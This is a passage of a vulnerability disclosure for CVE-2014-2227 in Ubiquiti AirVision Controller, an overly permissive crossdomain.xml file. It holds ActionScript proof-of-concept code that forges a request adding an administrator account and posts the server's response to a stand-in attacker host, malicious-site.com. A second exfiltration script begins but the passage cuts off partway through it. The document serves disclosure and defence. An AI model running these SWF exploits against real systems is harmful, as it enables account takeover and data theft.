<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><b>Step 2: </b></span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The victim, while logged into AirVision, views the SWF file on the attackers server:</span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="62px;" src="https://lh3.googleusercontent.com/NnrdzwtTW_9EVFHqsa5-PiA3Bsjo9Ypg50jaamO5Ddewjp43uZjTuj_IAtVGsEO_yuwsuM91fffIUbJJ2Qe058Emqlq3a_nACg2UWjKLX_EhQW0Xi964JziC3nssz4hz7RcTPnhHxXg" style="-webkit-transform: rotate(0rad); border: none;" width="605px;" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="54px;" src="https://lh5.googleusercontent.com/uPnlSMK7_8UxoaQ8AsudJuQEZ1CMMp89n8rnkCnYtLeMyuRfe9XGe_TF4f3jF5C8G-2PNZ0EHcmuV6PK_e2xaG1cTk7aizJ_LI6YpFt3IvjFpT8vXN1iuFr29V-6tSwti3IJedc8sKA" style="-webkit-transform: rotate(0rad); border: none;" width="494px;" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<b><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">S</span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">tep 3:</span></b><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> The SWF loads on the victims machine, and makes a request on behalf of the victim (exploiting CSRF to add an administrator):</span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="287px;" src="https://lh3.googleusercontent.com/E6Fe7o3CbQj2wqiW-FFlkX3d26wxcuTJspKmuAovCRpPjJVychkxQ3F9VUQITPfDaKXK4c-ORKbuA8ko2KH6nwTuNdJN1D2_GdryRVJy0L33BbKlxtV5IDe7xqapaPlzNiDyNwYmow8" style="-webkit-transform: rotate(0rad); border: none;" width="624px;" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Response:</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="244px;" src="https://lh5.googleusercontent.com/dL-Pf78AVMYAO_tBPpg1_7luXYgeRR9bnPibZ6WtTNXLjX_ZLxBTDo20fBrE9gaXyN7ScwMXG69w4mnnzzT84Zc_GDBmdEaYIjK7wJWH-Y4dYn5wSwkm_vZ1aiqaYk2G0iVKaoiRQrs" style="-webkit-transform: rotate(0rad); border: none;" width="624px;" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><b>Step 4: </b></span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The SWF is able to bypass Same-Origin-Policy because of the overly permissive crossdomain.xml file, and it records the server response to the previous request, and sends that to the attacker:</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="233px;" src="https://lh4.googleusercontent.com/xN9QwKK3gJa5vAbatv9IjCdc300vI41Bw93qJkM7bDg37ISH9gWM4xlcizpUABNmvcYPCsLsHiKJPGLrAx7uq3SZhT0MvcAnWzCxk164AT-paLUzTqepe05IMxf-8y--Cl9OOb1AvLE" style="-webkit-transform: rotate(0rad); border: none;" width="624px;" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The server receives the information and responds with a HTTP 200 OK. </span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="253px;" src="https://lh5.googleusercontent.com/FyOVInWVphGVZIEueiRCuDvUd5A-ew1ZrFSGiX_EGiQVokAyUVQnI30LXrTNi1CvlpK0lZNdlxuMKiO33B-LSJcpnGaeBNAq3fYUfKPjR9QoR1eyxbKUEIpJdhCxvCn_i7An5TLA6iM" style="-webkit-transform: rotate(0rad); border: none;" width="449px;" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Here is another example of how an attacker could exploit this vulnerability, that is much different than what CSRF can do. </span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">In the screenshot below, the SWF makes a request to /api/2.0/log?type=error. The SWF then reads the data that comes back from that request and sends it to the attacker’s server, where the attacker consumes the raw data. </span><span style="font-family: Calibri; font-size: 15px; line-height: 1; white-space: pre-wrap;"> </span></div>
<br />
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
</div>
<br />
<div dir="ltr" style="-webkit-text-stroke-width: 0px; color: black; font-family: Times; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 1; margin-bottom: 0pt; margin-top: 0pt; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="259px;" src="https://lh3.googleusercontent.com/ZQujzD6NAslweprDVE2HGoerJaO6QuIUWCYnv-lgyUvuC2wWfA3ECSV-_kuQhLChGqqlLFtYZNxPXteDOoVkT9FGSb8Eq9gXsK3qxFV8HIhtJfG5wlvp3lZwjxqdM0muvwGNCXEK6q0" style="-webkit-transform: rotate(0rad); border: none; cursor: move;" width="624px;" /></span></div>
</div>
<br /></div>
<br />
<div dir="ltr" style="margin-left: 0pt;">
Additional details:<br />
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">(</span><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">CVE-2014-2227) - </span><span style="font-family: Arial; font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Ubiquiti Networks - AirVision v2.1.3 - Overly Permissive default crossdomain.xml</span><span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Vendor: </span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Ubiquiti Networks (http://www.ubnt.com/)</span></div>
<span id="docs-internal-guid-40e51e5c-6556-8c2b-bfaf-5c045d682e57"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">----------------------------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Affected Products/Versions: </span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">----------------------------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">AirVision Controller v2.1.3</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Note: Previous versions may be affected</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Description:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Title: </span><span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Overly Permissive default crossdomain.xml file</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">CVE: CVE-2014-2227</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">CWE: CWE-264: </span><a href="http://cwe.mitre.org/data/definitions/264.html" style="text-decoration: none;"><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">http://cwe.mitre.org/data/definitions/264.html</span></a><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Researcher: Seth Art - @sethsec</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Detailed writeup (includes screenshots): </span><a href="http://sethsec.blogspot.com/2014/07/cve-2014-2227.html" style="text-decoration: none;"><span style="background-color: white; color: #1155cc; font-family: Arial; font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://sethsec.blogspot.com/2014/07/cve-2014-2227.html</span></a><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">------------------------------------------------------------------------------------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">POC #1: Using crossdomain.xml to execute CSRF and add an administrator:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">------------------------------------------------------------------------------------------------------</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">// Customized AirVision POC Author: Seth Art (</span><span style="background-color: white; color: #1155cc; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">sethsec at gmail.com</span><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">)</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">// POC Template Author: Gursev Singh Kalra (</span><span style="background-color: white; color: #1155cc; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">gursev.kalra at foundstone.com</span><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">)</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">// POC Template Author's github: (</span><a href="https://github.com/gursev/flash-xdomain-xploit" style="text-decoration: none;"><span style="background-color: white; color: #1155cc; font-family: Arial; font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://github.com/gursev/flash-xdomain-xploit</span></a><span style="background-color: white; color: #555555; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">)</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">package {</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> import flash.display.Sprite;</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> import flash.events.*;</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> import flash.net.URLRequestMethod;</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> import flash.net.URLRequest;</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> import flash.net.URLLoader;</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> import flash.net.URLRequestHeader;</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> public class XDomainXploit3 extends Sprite {</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> public function XDomainXploit3() {</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> // Target URL from where the data is to be retrieved</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> var readFrom:String = "https//victim:7443/api/2.0/admin";</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> var header:URLRequestHeader = new URLRequestHeader("Content-Type",</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">"text/plain; charset=UTF-8");</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> var readRequest:URLRequest = new URLRequest(readFrom);</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> readRequest.method = URLRequestMethod.POST</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> readRequest.data =</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">"{\"name\":\"csrf-cdp\",\"email\":\"</span><span style="background-color: white; color: #1155cc; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">csrf-cdp@gmail.com</span><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">\",\"userGroup\":\"admin\",\"x_password\":\"password\",\"confirmPassword\":\"password\",\"disabled\":false}";</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> readRequest.requestHeaders.push(header);</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> var getLoader:URLLoader = new URLLoader();</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> getLoader.addEventListener(Event.COMPLETE, eventHandler);</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> try {</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> getLoader.load(readRequest);</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> } catch (error:Error) {</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> trace("Error loading URL: " + error);</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> }</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> }</span></div>
<br />
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> private function eventHandler(event:Event):void {</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> // URL to which retrieved data is to be sent</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> var sendTo:String = "</span><a href="http://www.malicious-site.com/crossdomain/store.php" style="text-decoration: none;"><span style="background-color: white; color: #1155cc; font-family: Arial; font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://www.malicious-site.com/crossdomain/store.php</span></a><span style="background-color: white; color: #555555; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">"</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> var sendRequest:URLRequest = new URLRequest(sendTo);</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> sendRequest.method = URLRequestMethod.POST;</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> sendRequest.data = event.target.data;</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> var sendLoader:URLLoader = new URLLoader();</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> try {</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> sendLoader.load(sendRequest);</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> } catch (error:Error) {</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> trace("Error loading URL: " + error);</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> }</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> }</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> }</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">}</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------------------------------------------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">POC #2: Using crossdomain.xml to exfiltrate log data:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------------------------------------------------------------</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">// Customized AirVision POC Author: Seth Art (</span><span style="background-color: white; color: #1155cc; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">sethsec at gmail.com</span><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">)</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">// POC Template Author: Gursev Singh Kalra (</span><span style="background-color: white; color: #1155cc; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">gursev.kalra at foundstone.com</span><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">)</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">// POC Template Author's github: (</span><a href="https://github.com/gursev/flash-xdomain-xploit" style="text-decoration: none;"><span style="background-color: white; color: #1155cc; font-family: Arial; font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://github.com/gursev/flash-xdomain-xploit</span></a><span style="background-color: white; color: #555555; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">)</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">package {</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> import flash.display.Sprite;</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> import flash.events.*;</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> import flash.net.URLRequestMethod;</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> import flash.net.URLRequest;</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> import flash.net.URLLoader;</span></div>
<br />
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> public class XDomainXploit extends Sprite {</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> public function XDomainXploit() {</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> // Target URL from where the data is to be retrieved</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> var readFrom:String = "/victim:7443/api/2.0/admin";</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
